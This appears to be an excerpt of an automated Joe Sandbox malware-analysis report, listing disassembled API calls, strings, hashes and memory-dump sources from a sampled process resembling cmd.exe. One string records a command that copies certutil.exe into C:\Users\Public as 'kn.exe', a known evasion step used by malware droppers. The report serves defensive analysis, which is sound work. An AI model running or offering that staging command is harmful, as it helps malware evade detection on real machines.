• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538020
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538036
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538061
• RtlFreeHeap.NTDLL ref: 00007FF7D1538075
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15380D6
• RtlFreeHeap.NTDLL ref: 00007FF7D15380EA
• _wcsnicmp.MSVCRT ref: 00007FF7D1538177
• _wcsnicmp.MSVCRT ref: 00007FF7D153819A
• _wcsnicmp.MSVCRT ref: 00007FF7D15381BD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381DC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D153821A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D1538239
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538291
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15382D7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15382FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D153831A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538364
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1538378
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D153839A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15383AE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15383E6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538403
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538418
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3637805771-3100821235
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2231802c5beab9bdd248c916e857ea9e4c0ad7af45889cd9912036ac3472a9aa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6E15B31B0865B8AF714AB62A80017DFAA1FB49B95BD48276DD1F537B0DFBCA405C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s$%s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3623545644-3518022669
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7f0ca14dba81570daf1043cf92dd8dc488c77bbbf39cb6aeda10a61077ffaae8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
• Instruction Fuzzy Hash: 7DD29F32A0864B8AFB64AB61D4902BDB7A1FB45754FD04136DA0F47AB9DFBCE444C720
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
• String ID: %9d$%s
• API String ID: 4286035211-3662383364
• Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
• Instruction ID: a935db8b848e2476b3c7150c05001a084c48e8e298ec89019bfb058ed99e42d6
• Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
• Instruction Fuzzy Hash: 96529022A08B8B8AFB65AB64D8502FDB7A0FB85754FD04136DA0F477A4DFBCD5448720
Similarity
• API ID: wcsrchr$towlower
• String ID: fdpnxsatz
• API String ID: 3267374428-1106894203
• Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
• Instruction ID: fa687a1635aa5ee76f238fdc566571182f11a904223ed43a8e3156b0bd6539bb
• Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
• Instruction Fuzzy Hash: 0D42D063B0968B85FB64AF2594402BEA6A1FF45B80FD48076DE0F977A4DFBCE4418310
Similarity
• API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
• String ID: DPATH
• API String ID: 95024817-2010427443
• Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
• Instruction ID: f265ff26c7c94db9bffff594ef0a0d1e80106e717b9f263da8157f02c455b50f
• Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
• Instruction Fuzzy Hash: DA128132A0868B86FB64AF15A45017DFAA1FB89750FC44136EA5F477B5DFBCE4408B20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1980097535
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1795611712-3662956551
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF7D153EF33
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EF98
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFA9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFBF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7D153EFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFED
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F003
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F022
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F083
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F092
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F0A5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7D153F0DB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F135
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F16C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F185
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1161012917-1690691951
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15132F3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7D15132A4), ref: 00007FF7D1513309
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7D1513384
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D15311DF
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 611521582-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: \\?\
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 628682198-4282027825
Similarity
• API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
• String ID:
• API String ID: 16309207-0
• Opcode ID: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
• Instruction ID: 785f778e141e23ff6b32bc17f5f1bdbde7ceb6fdbc0556196f796a001e09b3df
• Opcode Fuzzy Hash: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
• Instruction Fuzzy Hash: 30228D62B08B8A86FF65AF20D8542ADA3A0FF45784FC04136DA1F4BBA5DFBCD1458310
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
• String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
• API String ID: 3863671652-4137775220
• Opcode ID: 7af4bee894cdf625162c68b6ef6d8248d7a9208546f4bac6ad7e1d8ad21b980b
• Instruction ID: e4d6ba0fa3cafe51f3213b76184d45e25dcbcfeb1aafedf8ce0c29b5d28044eb
• Opcode Fuzzy Hash: 7af4bee894cdf625162c68b6ef6d8248d7a9208546f4bac6ad7e1d8ad21b980b
• Instruction Fuzzy Hash: 3AE1BB22E0964B86FB62BB15A45837CB6A0AF45740FD64137E91F422B1DFBDE881C730
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
• String ID: $Application$System
• API String ID: 3538039442-1881496484
• Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
• Instruction ID: 7d0047dc12a25b682a98fc362789cc67f4cd4fa2c651befc5630ce6baa8eadb6
• Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
• Instruction Fuzzy Hash: DA51BB72A08B4A82FB61AB15B45467EFAA1FB89B44FC58136DA8F03764DFBCD444C710
APIs
• longjmp.MSVCRT(?,?,00000000,00007FF7D153048E), ref: 00007FF7D153DA58
• memset.MSVCRT ref: 00007FF7D153DAD6
• memset.MSVCRT ref: 00007FF7D153DAFC
• memset.MSVCRT ref: 00007FF7D153DB22
  • Part of subcall function 00007FF7D1523A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D153EAC5,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1523A56
  • Part of subcall function 00007FF7D1515194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7D15151C4
  • Part of subcall function 00007FF7D152823C: FindFirstFileExW.KERNELBASE ref: 00007FF7D1528280
  • Part of subcall function 00007FF7D152823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D152829D
  • Part of subcall function 00007FF7D15201B8: _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
  • Part of subcall function 00007FF7D15201B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
  • Part of subcall function 00007FF7D1514FE8: _get_osfhandle.MSVCRT ref: 00007FF7D1515012
  • Part of subcall function 00007FF7D1514FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1515030
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D153DDB0
  • Part of subcall function 00007FF7D15159E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1515A2E
  • Part of subcall function 00007FF7D15159E4: _open_osfhandle.MSVCRT ref: 00007FF7D1515A4F
• _get_osfhandle.MSVCRT ref: 00007FF7D153DDEB
• SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D153DDFA
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D153E204
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D153E223
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D153E242
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %9d$%s$~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3651208239-912394897
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 419af2923438f2799513d7d2ea363a3558cc2888e4afdcb144672576e08960f3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1427032A0868B8AF764AF21D8502EDB7A1FB45744FD00037E64F47AA9DFBDE5548720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
